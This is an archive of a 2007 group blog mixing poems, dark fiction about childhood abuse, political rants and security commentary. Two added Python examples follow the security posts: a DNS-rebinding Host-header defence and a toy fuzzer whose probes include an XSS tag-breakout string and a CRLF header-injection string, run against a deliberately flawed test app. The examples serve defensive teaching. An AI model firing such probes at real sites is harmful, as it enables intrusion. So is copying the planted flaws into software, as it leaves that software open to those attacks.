pink dominion
I was thinking just yesterday
about the day before,
about how I'd sat in the kitchen
and waged war on the floor
with a sorry brow pulled even lower
over my molten eyes on fire.
but I wasn't crying,
I had extinguished sight,
I explained to myself, as two
who came late to the fight
held their tiny helmets tight;
running clumsy after a toy red truck.
of all the 4 alarm thoughts
I'm condemned to recall,
it just had to be that one.
The one where you call
and say three magic words:
How've you been?
Your pink dominion
could be lifted
off my wasteland chest,
I could breathe again
independently
and no longer just dream
of sleep.
7.31.2007
praise be to Robert at 22:46 1 cries of outrage
7.30.2007
Grizzley Tate's Great Grape Experiment
By Berling Chesterfield
When I was eight I met a kid named Grizzley Tate. Grizzley wasn't really his first name, but all the other kids called him that because he was big and fat and made noises like a bear when you tried to tickle him. He didn't like being tickled, but all the other kids tried anyway. I guess they thought it was funny.
After a year of being made fun of and tickled I guess Grizzley realized he wasn't going to make any friends, so he decided to take up a business plan. He figured if the other kids wouldn't be his friends, at least they could be his customers. He set up a lemonade stand in the front of the school and sold water loaded with sugar and freshly squeezed lemon before class for 50 cents a cup. To get a leg up on the competition he originally served the lemonade in special edition drinking glasses with cartoon characters on them that he'd collected from years of eating the popular marshmallow cereal 'Smushy Puffs' and saving the box tops. After a while the kids just started taking the glasses, though, and his entire collection was gone in a matter of two weeks. I still have three in my kitchen cabinet.
One day the best kickball player at school, Brent Graffin, bought a glass of lemonade with 50 cents he'd stolen from another kid, Jared Mosher. Jared had big thick black glasses and went legally blind when he was fifteen. Back then he could still see pretty good, though. Brent took a big sip of the lemonade in front of his friends and then declared, "This lemonade tastes like pee!" and then spit it in Grizzley's face and poured the rest of it all over Grizzley's overalls. It looked like he'd peed his pants and the strong stinging smell of the lemonade under the hot sun only made it worse. Brent told everyone he scared Grizzley so much that he peed his pants and for a couple weeks everyone called Grizzley "big ole pee-pants Tate." Of course, that was a slightly clunky nickname for eight-year-olds to say and it never really stuck.
When I was nine I was friends with Grizzley for a few weeks during the summer. Our mothers were friends from work and my mom invited both of them over for lunch some days. Our moms would drink wine and talk about local politics while Grizzley and I would draw and listen to cassette tapes of the Beach Boys. On a particularly boring day in July, I was jumping on the trampoline in my neighbor's yard and trying to see how far I could throw a tennis ball from ten feet up in the air. My initial delusions of rocketing a tennis ball all the way across Mudville and into the neighboring town were quickly dashed. I was just sitting on the trampoline and looking at a tree when Grizzley came over and told me he had a great new idea.
Grizzley told me he had a plan to start selling grape juice to the kids at school in the Fall, and needed my help to start making juice so he'd have enough supply for the demand by the start of the school year. We went to the store and bought as many grapes as we could afford with the change from Grizzley's piggy bank, and rode our bikes to the big open field next to the power plant. There were empty barrels left scattered about the field and Grizzley said they'd be perfect for making grape juice in. He emptied all the grapes into two barrels that were set up next to each other, then took off his shoes, hopped in, and started stomping. It looked like a lot of fun and Grizzley wore a horrible little grin on his face while he slushed about, giggling. I hopped in the other barrel and started stomping away as well, thoroughly soaking my new white shorts and undershirt in grape guts and juice. After a while of stomping Grizzley pulled out a bag from his backpack filled with small red berries he'd collected from all around the neighborhood and said they were his secret ingredient.
I came home that night covered head to toe in purple. My mother was laying on the floor crying when I opened the door, and her low sobs became screeching wails when she set her red, puffy eyes on me. She beat me so bad I was even more purple, and forbade me from bathing for two weeks so the neighbors wouldn't see the bruises. She called Grizzley's mother a whore and said I was never to see him again. It didn't bother me much.
Grizzley Tate was run over by a train late that August. People said he did it on purpose, but I don't think so. He was really excited about the prospect of business in the upcoming schoolyear, and I don't even think he knew how to tie sailor's knots.
praise be to Robert at 15:10 2 cries of outrage
SOA security
The title of Joe McKendrick's most recent blog post over at ZDNet caught my eye, "Is Security the SOA Showstopper". First, this interested me simply because I love security; secondly, at my current summer internship I'm doing a lot of SOA work with Web Services and implementing use of the SOAP protocol for communications with a SQL database. Unfortunately for my sake it doesn't look like I'm going to get to do much WS security work simply because the summer is winding down, but I still find it really interesting to read about considering it's the next generation of security research. Joe in his blog goes on to state:
"SOA increasingly addresses services on both sides of the firewall, and therefore opens up the most critical business processes and data to outside intrusion. As frequently mentioned in this blogsite, there’s more convergence with Software as a Service and Web 2.0 — which open up things even more to outside influences."
Joe also references a recent report from InformationWeek titled SOA Security: One Treacherous Journey.
praise be to far from l33t0 at 11:45 0 cries of outrage
word of the day
palpable (adj) - 1. readily or plainly seen, heard, perceived, etc. Synonyms: obvious, evident 2. capable of being touched; tangible.
praise be to far from l33t0 at 10:36 2 cries of outrage
7.28.2007
civil nuclear cooperation
The U.S. and India have just reached a deal regarding nuclear cooperation for "civil purposes".
"The conclusion of negotiations on this agreement marks a major step forward in fulfilling the promise of full civil nuclear cooperation as envisioned by President Bush and Prime Minister Manmohan Singh," said U.S. Secretary of State Condoleezza Rice and Indian Foreign Minister Shri Pranab Mukherjee in a joint written statement.
The new civil nuclear cooperation between the two countries will "offer enormous strategic and economic benefits to both countries, including enhanced energy security, a more environmentally friendly energy source, greater economic opportunities, and more robust non-proliferation efforts," the statement said.
For those not entirely capable of reading between the lines, this is simply a response to the Iranian & Russian nuclear deal. Now we have a nuclear ally in the eastern hemisphere, in close proximity to both Iran and Russia. I'm not really sure how to respond to this. I really can't argue the reasoning behind the deal or the current administration's thought process. It's just unfortunate our world has come to this, where nuclear technology is the end all be all. Those seeking power wish to do so by means of fear. Nuclear fear.
Human nature is a bitch. We're going to destroy ourselves ;]
praise be to far from l33t0 at 10:39 0 cries of outrage
7.27.2007
insider threat security: technology and policy
I just recently finished reading "Enemy at the Water Cooler: Real-Life Stories of Insider Threats and Enterprise Security Management Countermeasures" by Brian T. Contos. I decided to read Contos's piece after reading a promising review on Slashdot. I was really hoping I might be able to use some of the material as reference for a paper or two this year in graduate school, but unfortunately that doesn't appear to be the case.
I can basically sum the book up in a single word...."eh". It wasn't terrible but at the same time wasn't providing any earth-shattering information. None of the ideas or concepts were new or original, which was somewhat frustrating considering the Slashdot review was so positive. Instead, it was a simplistic, low level summary of what most in the information security field should already know. However, Contos does manage to salvage the book with a number of in-depth case study analyses of companies and organizations playing the victim to insider threats.
Anyway, after reading Contos's book it made me think back to a paper I had written for an information privacy class last year. The paper discusses a number of technical and policy issues surrounding a hypothetical insider threat scenario from both the perspective of the attacker and victim. I figured I might as well take a minute to post it on here for your viewing pleasure. However, it should be noted, at the time I wrote this paper I was unaware of how common insider threat cases were, and mistakenly state something along the lines of "this hypothetical scenario is a rarity" when in fact insider threat scenarios are very common. Please disregard my prior ignorance ;]
-------------------------------------------------------------------
Introduction
Next, it is interesting to focus on hypothetical scenarios regarding information privacy, technology, and governance. These scenes enable the reader to grasp a comprehensive sense of what roles technology plays in obtaining and protecting private information. The first scene discusses a scenario from the perspective of a malevolent person using a technological tool to access unauthorized private information. The following scene discusses the scenario from the perspective of the victim and how he/she may potentially use technology as a means to protect private information. Additionally, it will be interesting to see the role governance and regulation play in the two different cases. By focusing on each scene and seeing things from both perspectives, one can obtain a better understanding of what roles technology plays regarding privacy issues.
Scene 1 – The Attacker’s Perspective
Large organizations like the hypothetical organization, “Digital Enterprises”, store massive amounts of private client data. Oftentimes large organizations such as these are the target of attacks. First, it is because these companies have private, sensitive information that outsiders want access to. Second, the connectivity and networking ability of the Internet enables users to develop, use, and distribute software, creating a jungle-like environment where anything can happen. “We refer to this situation as computation in the wild, by which we mean to convey the fact that software is developed, distributed, stored, and executed in rich and dynamic environments populated by other programs and computers, which collectively form a software ecosystem” (Park and Willinger).
Technology in this case provided Bob with a gateway to access private information he normally wouldn’t be authorized to. But is technology really to blame? “Privacy is fundamentally about the power of the individual. In many ways, the story of technology’s attack on privacy is really the story of how institutions and the people who run them use technology to gain control over the human spirit” (Garfinkel 5). I think it is important to understand that technology is being used as a tool to obtain private information. Technology by itself does not violate our privacy. The blame should not be placed on technology but rather on the people using it maliciously.
Governance Issues regarding Scene 1
Along with technology, it is equally interesting to focus on lawful governance issues that closely relate to the scene. Once Bob has access to the company database he has access to all of the company’s client data. Let’s say Bob wasn’t solely interested in credit card numbers, he may also have access to client addresses, client purchase information, client phone numbers, client billing information etc. These all bring up a number of lawful governance issues worth looking into.
Scene 2 – The Victim’s Perspective
Technology Issues regarding Scene 2
Governance Issues regarding Scene 2
praise be to far from l33t0 at 17:20 0 cries of outrage
confessions of a middle school dropout
by Berling Chesterfield
I didn't have an unhappy childhood.
I remember when I was growing up
my friends and I would hike deep
into the thick woods, until we couldn't
see where we came in anymore, and we'd
set up camp fires, sit around for a few hours,
and then put the fires out. Sometimes
we'd forget to put them out and they'd start
wildfires. I don't remember too much
about those times, though.
I did a lot of drugs when I was nine.
My father was a night dancer and
my mother was an accountant.
They'd go years at a time without
seeing each other.
They were very happy.
My mother would come home around six
and my parents would loudly make love
with blindfolds on for about an hour,
until it was time for my father to go dance.
I had two babysitters, a day sitter and a night sitter,
and I was sexually 'educated' by both.
They used to throw lit cigarettes at me
and tell me to "dance like your daddy."
The two sitters didn't know each other
and never met, so I don't know how they
both knew to do that.
On hot summer days I'd go swimming
at the man-made lake next to the power plant.
I'd swim out to the middle and wade for hours,
imagining I was lost at sea. I subsequently
developed a very muscular upper body.
I had a girlfriend for a month when I was 17.
She said I smelled bad one day so I spit in her
hair and told her I loved her.
She punched me in the gut and called me a loser.
I really did love her, too.
praise be to Robert at 16:44 4 cries of outrage
generation woah
woah is me.
woah, am i?
listings on tv:
be my guide.
smoking fraggle rocks,
raised by joeys glad, stoned.
distant dictators declare
an answer: just say woah.
hey dudes, here's what i know:
family matters. partial guardians
up and split, become remote,
remain civil, splinter the holidays.
we, the allied loners
holding close our remotes,
fear a future civil dispute
pitting step-brother against step-brother.
praise be to Robert at 12:26 0 cries of outrage
7.26.2007
alcoholic synonymous
hi, my name is
mine
for all
time.
long past the lives of loved ones
(former, fake, otherwise),
when strangers have forgot
the placement of my plot,
my headstone will erode,
travel down and be washed out,
sinking in increments
into the sea.
Those pebbles
will still be mine.
and they'll collect
at the cold below,
becoming future mountains
beneath silver waves.
My fitting end,
and if memory
serves anything -
mine will stay in stone,
knowing all I know
about the building
of something
no one could see
but me.
praise be to Robert at 16:54 0 cries of outrage
gov't...sometimes u need to stay out of our lives
according to a number of US senators, parents aren't quite doing the best job at performing their parental duties. as a result, the government has decided it is in everyone's best interest to have them step in and parent the children of today's information age.
"US senators today made a bipartisan call for the universal implementation of filtering and monitoring technologies on the Internet in order to protect children at the end of a Senate hearing for which civil liberties groups were not invited."
first off, i applaud you, US senators, for not inviting civil liberties groups to this hearing. they may have voiced a different opinion disagreeing with yours and probably would have offered varying perspectives on the issue. this whole idea of listening to many and obtaining a more thorough, comprehensive understanding of the issue would have been a time consuming inconvenience. obviously you, the members of the US senate, know what is best for all members of our society.
secondly, i think it's wonderful we're taking the necessary steps to create our own great firewall similar to that of communist China. that's done wonders for their country and i'm sure we'd see similar results over here.
lastly, taking the parental duties from parents to monitor what their own children are doing is a step in the right direction. parents shouldn't have a say in how they go about raising their own children anyway. obviously you, the government, can do a much better job. i mean come on, it worked for the Hitler Youth and Nazi Germany right?
praise be to far from l33t0 at 11:15 0 cries of outrage
word of the day
taciturn (adj) - habitually reserved in speech; inclined to silence. Synonyms: silent, reticent.
praise be to far from l33t0 at 10:15 0 cries of outrage
what is kenny saying??
ever wonder what kenny from south park is saying in the song from the opening credits under his muffled speech??? it's not exactly PG material...
"Kenny's lines in the song, like the rest of his speech in the show, are muffled by his parka hood, which covers his entire face except for his eyes. However, Kenny's lines have been revealed by South Park Studios. In seasons 1-2, he says "I love girls with big fat titties, I love girls with deep vaginas." From seasons 3-5 he says "I have got a 10-inch penis, use your mouth if you want to clean it." From season 7 to the first half of season 10, Kenny says "Some day I'll be old enough to stick my dick in Britney's butt." The current lines are not known."
praise be to far from l33t0 at 08:06 0 cries of outrage
7.25.2007
House of Slush
A large white styrofoam cup that reads 'House of Slush' sits against a red brick wall.
EXT. BACK ALLEY - DAY
A low flying plane rumbles loudly overhead on a hot, hot sunny day. Conversation and coughing can be heard coming from further down the alley. The camera pulls out as the cup begins to rattle. A sound of claws and fur against styrofoam is heard as the cup begins to shake back and forth with increasing force. Finally, the cup tips over and an orange three-legged RAT, covered in slushie, scampers out.
The rat hurriedly hobbles down the alley past two pairs of dirty white shoes. The camera pans up to reveal two young men wearing brightly colored shirts with black aprons, smoking a joint and talking. The young man on the right, white - early 20's, exhales a giant plume of smoke and leans back against a propped-open bright orange painted metal door marked: No Entrance. He is BEN.
The young man on the left, teenage - Puerto Rican and overweight, stares dead ahead with a stupid grin on his face. A full ten seconds pass before he looks over to see the rat that had passed still hurrying down the alley and into the street. He opens his mouth slightly and curls his upper lip. This is CELSO.
praise be to Robert at 13:23 2 cries of outrage
politics smolotics
My conservative father recently added me to a political email list that he and his GOP lovin' cronies enjoy ranting on. My cousin and I are the only liberal minded thinkers on the list and are attacked hourly by these old, close-minded dinosaurs.
So anyway, my email list adversary, Jimmy, and I have had a number of issues. If I ever say anything, Jimmy is always the first to respond with some stupid response like "terrorism is bad". It doesn't matter what we're talking about, could be gay rights, abortion, health care; Jimmy will always remind me that terrorism is in fact bad. Thank you Jimmy. For this knowledge I remain always indebted to you. Below is Jimmy's and my most recent discussion....
----------------------------------------------------------
Jimmy: my party defended our country when attacked, yours looked the other way and won't finish the war as it is not in their political best interests, that's politics.
my party protected citizens, your party protects the enemy
Me: "my [jim's] party protected citizens"
Now at which point was your party protecting US citizens? Was it when "your" party's leader led our nation into war under false pretenses? or when "your" party's leader used the Patriot Act (patriot act, what a great name) as a deceitful facade to strip US citizens of their civil liberties?
And claiming the Dems protect the enemy and support terrorism is just ridiculous. Using some bogus statement like that revokes all credibility from a potentially worthwhile discussion.
Jimmy: Doug (my first name isn't l33t0 believe it or not),
Do you think that 911 was an act of war?
Do you think our response was too strong when we decided to remove from power a chronic dictator who would if he could attack us while expanding his own borders through war against other Middle East countries?
Do you think the fact we haven't had an attack on our soil since is because of luck?
Do you think W wanted to attack Iraq for other reasons than our national security?
If W is successful, he will be one of if not the greatest presidents of your life time as viewed by history, not editorial boards, remember Lincoln? he wasn't too popular at the time, nor were his decisions without pain and much blood, but our country is far better off, so will the middle east be if and when Iraq can bleed out their internal religious differences just as we have had to do here. The US is the ONLY superpower because of freedom, freeing the Iraqis can birth a similar vision that may with much prayer lead to religious tolerance that could effectually spread throughout the world.
Me: 1. Do you think that 911 was an act of war?
Yes, but who attacked us, Osama bin Laden and Al-Qaeda or Saddam and Iraq? Following 9-11, fear of terrorism reached a climactic point. The United States public looked to our leader, G.W, seeking answers. We, the United States public following 9-11, were incredibly impressionable and impulsively looking to respond. So Bush deceived us and told us Iraq had weapons of mass destruction, well aware the public would support him in accomplishing what both he and his father wanted to do for years, remove Saddam from power.
2. Do you think our response was too strong when we decided to remove from power a chronic dictator who would if he could attack us while expanding his own borders through war against other Middle East countries?
Now here we agree. Removing Saddam was a good thing, in fact the highlight of the war (which you Bush supporters love to cling to despite all his other failures). But was it necessary to deceive the United States public, and exaggerate non-existent links between Saddam and Al-Qaeda? Was it necessary to make false claims regarding weapons of mass destruction? Was the timing in going after Saddam really the best considering we were just attacked by Al-Qaeda and not Saddam's Iraq? Doesn't it make you the least bit uneasy knowing your leader deceived you, our country, in a time of need like no other in US history following an attack of such magnitude on US soil?
3. Do you think the fact we haven't had an attack on our soil since is because of luck?
Let me tell you what I do think. I certainly believe there are a number of sleeper terrorist cells in our country waiting to be activated. I certainly believe another attack on US soil is inevitable considering our current administration's handling of worldly affairs. I certainly believe (as Phil has said) that your logic/argument masked under this question is incredibly weak. Once this unavoidable attack does occur what do you have to fall back on?
Has the color coded terror alert scheme given you solace in believing that our government is really on top of the ball, well aware of and able to prevent future terrorist attacks (http://www.terror-alert.com/)? As of right now, we're in the yellow, "significant risk of attack"...they must obviously be in the midst of combating this potentially "significant risk".
To conclude, yes Jimmy I believe we have been lucky thus far that an attack on US soil has not yet taken place since 9-11.
4. Do you think W wanted to attack Iraq for other reasons than our national security?
Again, was it really the right time to invade Iraq? What about Iran? Why didn't Bush lie to us about Iran having weapons of mass destruction and take military action there? Oh right, because he wouldn't have been lying, instead he would have actually been telling the truth. Putin and the Russians have been aiding Iran in developing nuclear technology for some time now. Wait a second, isn't Iran a nation that harbors a significant number of Islamic fundamentalists who would love to launch a nuclear strike on US soil? Isn't that a more important matter of national security????
5. If W is successful, he will be one of if not the greatest presidents of your life time as viewed by history, not editorial boards, remember Lincoln? He wasn't too popular at the time, nor were his decisions without pain and much blood, but our country is far better off, so will the middle east be if and when Iraq can bleed out their internal religious differences just as we have had to do here.
"If W is successful"...again your logic is weak. You're not going to win an argument/convince me of anything with hypothetical rhetoric. Putting Lincoln in the same sentence as G.W is laughable. G.W is the modern day Harding and that's being generous.
Lincoln fought a war to keep our country (emphasis on OUR country) unified and to end slavery. Much blood was shed in response to a just cause. G.W on the other hand has been fighting a war in vain. What if your son or daughter was being deployed back to Iraq for his/her third or fourth tour? Would you still support sending even more troops over to fight? Would you want your child risking his/her life on yet another tour of Iraq when even the Iraqis don't want us there?
And chances are Iraq won't bleed out their internal religious differences anytime soon. And if we, the US, want to try and solve their internal religious issues we might as well get involved with the Israelis and the Palestinians while we're at it. I'm sure we can provide the means and reasoning to solve THEIR religious issues that stem back for hundreds of years.
Jimmy: Terrorism is bad.
praise be to far from l33t0 at 10:05 0 cries of outrage
7.24.2007
the illuminati made me late for work
wide eyes staring wild.
digital discomfort. dark
under semi-circles hugging.
unusual suspects flash,
actual perps buried alive,
deep in dead memory.
the sun is burning
while i'm bending
like light through a wine glass.
the end is starting
over. I'm in them,
viscus visions of last night.
black dash speeding back.
masking mist. message
received upon waking:
'I'm hurt. what happened?'
my reply, an aside: 'It's broken.'
praise be to Robert at 10:45 0 cries of outrage
word of the day
esoteric (adj) - understood by or meant for only the select few who have special knowledge or interest; Synonyms: arcane.
praise be to far from l33t0 at 08:11 0 cries of outrage
7.23.2007
ghosts don't breathe
to learn, first,
one must
understand learning.
a slick wick
knows only
patience and burning.
but being sees
holy ropes
unravelled threadbare.
our grating fates
reveal appeals:
am I anywhere?
praise be to Robert at 15:39 0 cries of outrage
XSSDB
so there's a new updated XSSDB at gnucitizen. it's quite badass i suggest you check it out, here's a screen shot below...
praise be to far from l33t0 at 14:48 0 cries of outrage
7.21.2007
Ever want to change the world?
Ever want to change the world? An easy question right? Yes or no. No variables. No ambiguity. Do YOU want to change the world, for better or for worse.
Life was meant to be lived…so profound, I know. But sometimes we all become so consumed with the bullshit we forget what’s really important. Family, friends, relationships, love, hate, happiness, sadness, independent thought.
When you’re happy, you’re happy. When you’re sad, you’re sad. When you’re in love, you’re in love. When you’re in lust, you’re in lust. But you’re living, you’re always living life. You’re always capable of changing the world. We’re always capable. We are life. Life is us. I want to change the world.
praise be to far from l33t0 at 00:13 1 cries of outrage
7.20.2007
Google expiring cookies earlier to improve privacy
Google has recently taken a step forward in attempts to improve privacy for those using their search engine. I don't know if I'd necessarily call it a full blown "step", more like a tip-toe in the right direction...however, the fact that they've done anything at all is comforting.
"After listening to feedback from our users and from privacy advocates, we've concluded that it would be a good thing for privacy to significantly shorten the lifetime of our cookies — as long as we could find a way to do so without artificially forcing users to re-enter their basic preferences at arbitrary points in time. And this is why we’re announcing a new cookie policy.
In the coming months, Google will start issuing our users cookies that will be set to auto-expire after 2 years, while auto-renewing the cookies of active users during this time period. In other words, users who do not return to Google will have their cookies auto-expire after 2 years. Regular Google users will have their cookies auto-renew, so that their preferences are not lost. And, as always, all users will still be able to control their cookies at any time via their browsers."
praise be to far from l33t0 at 11:58 0 cries of outrage
DNS Pinning
In recent months DNS Pinning has been the primary topic of discussion amongst security researchers. Darkreading reports that at the upcoming Black Hat USA conference DNS Pinning will be covered extensively by security architect David Byrne. This type of attack can absolutely cripple an organization by enabling attackers to bypass firewalls and access the thought-to-be inclusive company Intranet.
Basically DNS Pinning allows an attacker to bypass an organization's firewall by fooling the "same origin policy". The "same origin policy" is used to restrict access to the Intranet from requests being made from the outside Internet. Instead of me wasting time trying to explain how the attack works in depth, you're better off checking out Christ1an's write-up. He does a great job explaining the HTTP requests made and provides thorough graphical representations of how the attack works. It's a pretty complex attack and might take a couple of read-throughs to fully grasp the concept.
praise be to far from l33t0 at 10:50 0 cries of outrage
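The post leaves the mechanics to Christ1an's write-up, but the server-side check that blunts the attack it describes (DNS rebinding, the "anti-DNS-pinning" trick) is short enough to show here. After a rebinding, the victim's browser does send the request to the intranet address, yet the Host header still carries the attacker's domain, because browsers fill Host from the URL they were told to fetch, not from whatever the name currently resolves to. An intranet service that only answers to its own names therefore refuses the rebound request regardless of what DNS says. The following is an added example, not code from the write-up or from Byrne's talk; the host names, the header mapping and the placeholder page are assumed values constructed for the demonstration.

```python
"""Host-header allowlisting: the standard server-side defence against
DNS rebinding. Added example; host names below are assumed values."""

# Names this intranet service legitimately answers to (assumed values).
ALLOWED_HOSTS = {"intranet.corp.example", "localhost", "127.0.0.1"}


def normalize_host(host_header):
    """Lower-case the Host value and strip any port, handling [ipv6]:port.

    Returns None for a missing or malformed header so the caller fails closed.
    """
    if host_header is None:
        return None
    host = host_header.strip().lower()
    if host.startswith("["):                      # bracketed IPv6 literal
        end = host.find("]")
        rest = host[end + 1:] if end != -1 else ""
        if end == -1 or (rest and not rest.startswith(":")):
            return None                           # malformed, reject
        return host[1:end]
    if host.count(":") == 1:                      # name:port or v4:port
        host = host.rsplit(":", 1)[0]
    return host.rstrip(".") or None


def host_is_allowed(host_header, allowed=ALLOWED_HOSTS):
    """True only if the Host header names this service.

    A rebound request arrives with the attacker's domain in Host, so an
    allowlist on Host neutralises the rebinding no matter what the name
    resolved to at the moment the browser connected.
    """
    host = normalize_host(host_header)
    return host is not None and host in allowed


def handle_request(headers):
    """Minimal dispatcher: returns (status, body) for a request's header mapping."""
    if not host_is_allowed(headers.get("Host")):
        # 421 Misdirected Request (RFC 7540 section 9.1.2) is the fitting refusal.
        return 421, "Misdirected Request: unrecognised Host header"
    return 200, "intranet page (constructed placeholder content)"


if __name__ == "__main__":
    # Constructed requests: a normal intranet visit, a rebound request that
    # still names the attacker's site, and a request with no Host at all.
    for hdrs in ({"Host": "intranet.corp.example:8080"},
                 {"Host": "attacker.example"},
                 {}):
        print(hdrs.get("Host"), "->", handle_request(hdrs))
```

The check belongs in every HTTP service reachable from the intranet, not just the ones that hold sensitive data, since the attacker's script can target any of them once the rebinding succeeds; an IP literal is only accepted if it is explicitly on the allowlist, so `[::1]:8080` is refused here unless `::1` is added.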
word of the day
lugubrious (adj) - weighty, mournful, or gloomy especially to an excessive degree. "Jake's lugubrious monologue depressed his friends."
praise be to far from l33t0 at 09:29 3 cries of outrage
7.19.2007
face-f*ck my heart
by Berling Chesterfield
clumsy clod caught choking on air.
he clumsily clawed underwater
at ropes holding a submerged bridge.
blaming the cigarette for the clouds,
I let the AC smoke it for me.
in a condition of pure falling
up and down: falling up with
a fell swoop at seeing the shine.
letting my skin burn and grow
new; dull and shiny, catching light
like fresh plastic. chemicals
matter to chemists, but
the slob's sleeves disarm his
intended attraction.
i walked backwards, in time, watching
you a few hours ago: you were different.
praise be to Robert at 13:07 0 cries of outrage
home grown google XSS fuzzer
apparently google has developed their own XSS fuzzer "Lemon", however they have no plans of releasing it to the public...
"How about an automated tool for finding XSS problems in web applications? Our security team has been developing a black box fuzzing tool called Lemon (deriving from the commonly-recognized name for a defective product). Fuzz testing (also referred to as fault-injection testing) is an automated testing approach based on supplying inputs that are designed to trigger and expose flaws in the application. Our vulnerability testing tool enumerates a web application's URLs and corresponding input parameters. It then iteratively supplies fault strings designed to expose XSS and other vulnerabilities to each input, and analyzes the resulting responses for evidence of such vulnerabilities. Although it started out as an experimental tool, it has proved to be quite effective in finding XSS problems. Besides XSS, it finds other security problems such as response splitting attacks, cookie poisoning problems, stacktrace leaks, encoding issues and charset bugs. Since the tool is homegrown it is easy to integrate into our automated test environment and to extend based on specific needs. We are constantly in the process of adding new attack vectors to improve the tool against known security problems."
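The quote describes the loop a black-box fuzzer runs: enumerate the input parameters, feed fault strings to each, and classify the responses. Here is that loop written out as an added Python example (my own illustration, not Google's Lemon code) against a constructed in-memory stand-in for the application, with deliberate defects of three kinds the quote lists: an unencoded reflection, a header that accepts CRLF (response splitting), and a leaked stack trace. The canary string, probes, parameter names and trace text are all constructed.

```python
import html
import re
from collections import namedtuple

Response = namedtuple("Response", "status headers body")

# Constructed marker, chosen to be unlikely in a normal page.
CANARY = "zq7kx"


def _reflected_raw(resp, fault):
    """Fault string came back byte-for-byte: no output encoding on that path."""
    return fault in resp.body


def _header_injected(resp, fault):
    """A header value now contains a line break: response splitting is possible."""
    return any("\r" in value or "\n" in value for _, value in resp.headers)


# (name, fault string, finding it demonstrates, check applied to the response)
PROBES = [
    ("tag-breakout", '"><' + CANARY + '>', "unencoded reflection", _reflected_raw),
    ("crlf", "\r\nX-" + CANARY + ": 1", "header injection", _header_injected),
]

# Applied to every response regardless of probe.
STACK_TRACE = re.compile(r"Traceback \(most recent call last\)|\bat [\w$.]+\([\w.]+:\d+\)")


def toy_app(params):
    """Constructed stand-in for the application under test. Deliberate defects:
    'pg' is written into an attribute unescaped, 'lang' goes into a Set-Cookie
    header with no CRLF filtering, and a non-numeric 'debug' leaks a stack trace.
    'q' is encoded correctly and should come back clean."""
    headers = [("Content-Type", "text/html")]
    if not params.get("debug", "0").isdigit():
        body = ("Traceback (most recent call last):\n"
                '  File "app.py", line 12, in handle\n'
                "ValueError: invalid literal for int()")      # constructed trace text
        return Response(500, headers, body)
    if "lang" in params:
        headers.append(("Set-Cookie", "lang=" + params["lang"]))
    body = ('<input type="hidden" name="pg" value="%s">' % params.get("pg", "index")
            + "<p>%s</p>" % html.escape(params.get("q", "")))
    return Response(200, headers, body)


def fuzz(app, baseline):
    """Send every probe to every parameter of the baseline request in turn and
    classify each response. Returns {parameter: sorted list of findings}."""
    report = {}
    for name in baseline:
        findings = set()
        for _, fault, finding, check in PROBES:
            resp = app({**baseline, name: fault})
            if check(resp, fault):
                findings.add(finding)
            if STACK_TRACE.search(resp.body):
                findings.add("stack trace leak")
        report[name] = sorted(findings)
    return report


# Constructed baseline request: the parameters the crawler would have enumerated.
BASELINE = {"pg": "index", "q": "", "lang": "en", "debug": "0"}

if __name__ == "__main__":
    for param, findings in fuzz(toy_app, BASELINE).items():
        print(param, findings or ["clean"])
```

Run in a test environment against your own application, the report maps each finding to the fix: the reflected parameter needs output encoding for its context, the header needs CRLF stripping, and the crashing path needs a generic error page instead of a trace.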
praise be to far from l33t0 at 11:47 0 cries of outrage
mountains named after people
I'm working right now. I've managed to fill up the first 3 hours somehow, without even cracking open my book. I usually wait until later in the afternoon to be so blatantly not doing anything pertinent for the company. Apparently some of the bosses who are in Hawaii right now come back next week, so that scares me a little bit.
I think we're going to the mall at lunch, but I'm currently broke as a joke so I'll be relegated to the position of consummate window shopper (i used the word 'consummate' in a post last week too, i hope no one notices). I just noticed some really weird painful bump on my right hand, on the knuckle. I have no idea what it is or could be - the possibilities include: bug bite, spider bite, wart, or maybe the flesh eating disease. none of those sound fun (especially warts, yuck).
If i ignore it, it'll go away. That's something I've learned from the people I go away from.
The rest of the afternoon will be spent eating fun-size twix bars for sustenance, looking up the proper spelling of the word 'sustenance' but ultimately dismissing it and refusing to edit the post, drinking another can of diet mountain dew, and wondering why waking up early gives me stomach aches.
i use the word 'wonder' too much, but i'm not curious as to why.
praise be to Robert at 11:23 1 cries of outrage
word of the day
zeal (noun: zealot, zealotry; adj: zealous) - enthusiastic devotion to a cause, ideal, or goal.
praise be to far from l33t0 at 07:42 0 cries of outrage
7.18.2007
talent
am i the last person to hear about ronald jenkees?
praise be to far from l33t0 at 19:35 0 cries of outrage
pigment figments; rainbow ghosts
on another unsanctioned break I stood outside staring at the red brick wall of the building across from me and imagined myself as one of the dummies sitting in an invisible car hurtling towards the wall at a million miles an hour. it was sunny and nice outside.
praise be to Robert at 17:17 0 cries of outrage
shredding headlines: no paper trail of tears
so there's drama at the office over a regional manager of some bank and trust that came in, who was apparently some hot shot possible client. he came in yesterday and today and shot the shit with anyone who he could talk to about what they do at the company, how things are going, etc. he was told by management that we're doing 9,900 deals a month. according to the employees here I've talked with so far, the figure is closer to 100 a month, if it's a good month. this amount of deception doesn't sit well with me. after spending an hour reading about Hemingway, I went out to smoke a cigarette and think about some articles I had read on digg. One of them was about a former Reaganite who predicted the Bush administration would, within the next year, stage a false flag event, reinstate the draft, and declare a dictatorship. the next link I clicked was of a dog consoling a small boy.
finally I thought about a scientist's claim that if we don't colonize Mars in the next 50 years, humanity is doomed. I wonder, is it such a loss? as I walk back from the cigarette break (not during an official break period) I pass a row of large filing cabinets marked "deceased" and wonder what's inside.
praise be to Robert at 15:17 0 cries of outrage
What’s ‘fast-flux’?
I’m disappointed in myself for having never heard the term ‘fast-flux’ before about ten minutes ago, when I came across this. Despite the fact this concept is relatively new (about a year old) I’m utterly disgraced with myself for having never heard of it.
So what is this ‘fast-flux’ all about? Basically fast flux is a malicious-website-botnet-infrastructure concept type thingy. Understand? Wait, you don’t? That’s not quite the explanation you were looking for? Not quite clear enough? Somewhat vague? Are you sick of these rhetorical questions? Should I continue? Ok then…
Basically what I mean by malicious-website-botnet-infrastructure type thingy is that infected bot machines (slaves, zombies, whatever you want to call them) act as proxies for malicious sites. The concept of fast flux simply means that the bot machines acting as proxies for the malicious site are rotated continuously, with the site’s DNS information changing just as often, which enables the site to circumvent an ISP’s IP block list.
I think this is really quite interesting and very clever. So how do security professionals stop this from happening? Well, the only answer I can come up with for now is to better inform the Internet community about phishing sites and the danger of following ambiguous links. Kind of a weak answer, I know, but it’ll be interesting to see what happens.
